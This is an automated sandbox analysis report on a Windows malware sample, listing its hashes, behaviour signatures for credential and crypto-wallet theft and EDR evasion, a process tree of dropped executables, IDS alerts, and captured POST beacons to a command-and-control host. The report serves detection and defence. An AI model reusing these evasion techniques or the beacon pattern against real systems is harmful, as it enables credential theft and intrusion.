Windows Analysis Report
w3245.exe

Overview

General Information

Sample name: w3245.exe
Analysis ID: 1584991
MD5: e92b4d3ee13da899ea0ad5b54a0094ed
SHA1: 6068b49ac36eb618d20f5b3b4efad1d9bac68f5b
SHA256: 97abaf743b7b33aa0f0c6ab83527cc253c9e231c4e68da5d9a42fc45ef655877
Tags: exe user-NatrXN1O1
Infos:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • w3245.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\w3245.exe" MD5: E92B4D3EE13DA899EA0AD5B54A0094ED)
    • w3245.exe (PID: 7088 cmdline: "C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528 MD5: EC4072E1AE2A9316270E6AFD66235A97)
      • RescueCDBurner.exe (PID: 6296 cmdline: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
        • RescueCDBurner.exe (PID: 5828 cmdline: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
          • cmd.exe (PID: 5576 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 4176 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 1216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 708 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1984,i,12396277131636632407,2205267590406277603,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • RescueCDBurner.exe (PID: 4476 cmdline: "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • cmd.exe (PID: 1272 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 5580 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 2352 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5632 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1196 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6512 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7180 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 7668 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 7688 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 7344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6644 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 8124 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7428 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1992,i,12794935825972523689,1062421692314691261,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 6188 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5020 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1984,i,5351310162108678119,10159255576747894809,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp                        SID      Severity  Classtype        Source IP    Source Port  Destination IP  Destination Port  Protocol
2025-01-06T23:04:46.839981+0100  2028371  3         Unknown Traffic  192.168.2.4  49739        104.21.80.52    443               TCP
2025-01-06T23:04:48.051667+0100  2028371  3         Unknown Traffic  192.168.2.4  49740        104.21.80.52    443               TCP
2025-01-06T23:04:49.124251+0100  2028371  3         Unknown Traffic  192.168.2.4  49741        104.21.80.52    443               TCP
2025-01-06T23:05:14.230605+0100  2028371  3         Unknown Traffic  192.168.2.4  49911        104.21.80.52    443               TCP
2025-01-06T23:05:15.603604+0100  2028371  3         Unknown Traffic  192.168.2.4  49919        104.21.80.52    443               TCP
2025-01-06T23:05:16.502609+0100  2028371  3         Unknown Traffic  192.168.2.4  49929        104.21.80.52    443               TCP
2025-01-06T23:05:17.372518+0100  2028371  3         Unknown Traffic  192.168.2.4  49938        104.21.80.52    443               TCP
2025-01-06T23:05:18.210322+0100  2028371  3         Unknown Traffic  192.168.2.4  49946        104.21.80.52    443               TCP
2025-01-06T23:05:19.374062+0100  2028371  3         Unknown Traffic  192.168.2.4  49953        104.21.80.52    443               TCP
2025-01-06T23:05:19.505451+0100  2028371  3         Unknown Traffic  192.168.2.4  49954        104.21.80.52    443               TCP
2025-01-06T23:05:20.486339+0100  2028371  3         Unknown Traffic  192.168.2.4  49960        104.21.80.52    443               TCP
2025-01-06T23:05:20.681592+0100  2028371  3         Unknown Traffic  192.168.2.4  49966        104.21.80.52    443               TCP

AV Detection

Source: Submited Sample | Integrated Neural Analysis Model: Matched 98.3% probability
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007DA0BB DecryptFileW,0_2_007DA0BB
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007FFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_007FFA62
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007D9E9E DecryptFileW,DecryptFileW,0_2_007D9E9E
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A1A0BB DecryptFileW,1_2_00A1A0BB
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A3FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,1_2_00A3FA62
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A19E9E DecryptFileW,DecryptFileW,1_2_00A19E9E
Source: RescueCDBurner.exe, 00000002.00000002.1716689796.000000006C7E9000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_4946dd66-f
Source: w3245.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File opened: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49938 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.4:49966 version: TLS 1.2
Source: w3245.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3245.exe, 00000000.00000000.1658861478.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000000.1665459198.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000002.00000003.1693692874.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715594343.000000006BD71000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000003.00000002.1776456470.000000006B031000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000002.00000002.1715727918.000000006BE31000.00000020.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000003.00000002.1777432976.000000006CBE1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000002.00000002.1715404801.000000000A8B0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715225657.000000000A555000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775652774.000000000A420000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775526982.000000000A0CD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775805982.000000000A7D7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045741846.0000000005170000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045008302.0000000004896000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2372737686.0000000005D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000002.00000002.1715404801.000000000A8B0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715225657.000000000A555000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775652774.000000000A420000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775526982.000000000A0CD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775805982.000000000A7D7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045741846.0000000005170000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045008302.0000000004896000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2372737686.0000000005D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000002.00000002.1717094583.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000003.00000002.1777831407.000000006CDC1000.00000020.00000001.01000000.00000011.sdmp
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_007C3CC4
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_00804440 FindFirstFileW,FindClose,0_2_00804440
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_007D9B43
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A44440 FindFirstFileW,FindClose,1_2_00A44440
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A19B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00A19B43
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A03CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00A03CC4
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3D32E
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,1_2_5BB3D43A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BD981A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,2_2_6BD981A1
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BDCC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,2_2_6BDCC8FD
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BDCCC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,2_2_6BDCCC23
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,1_2_5BB3AFDD
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 4x nop then or byte ptr [edi], dh 2_2_6BD87270
Source: Joe Sandbox View | IP Address: 20.189.173.4 20.189.173.4
Source: Joe Sandbox View | IP Address: 108.139.47.50 108.139.47.50
Source: Joe Sandbox View | IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49911 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49919 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49929 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49938 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49946 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49954 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49960 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49966 -> 104.21.80.52:443
Source: global traffic | HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 Content-Length: 147 Host: bamarelakij.site
Source: global traffic | HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ Content-Length: 53 Host: bamarelakij.site
Source: global traffic | HTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ Content-Length: 208 Host: bamarelakij.site
Source: global traffic | HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic | HTTP traffic detected: GET /b?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
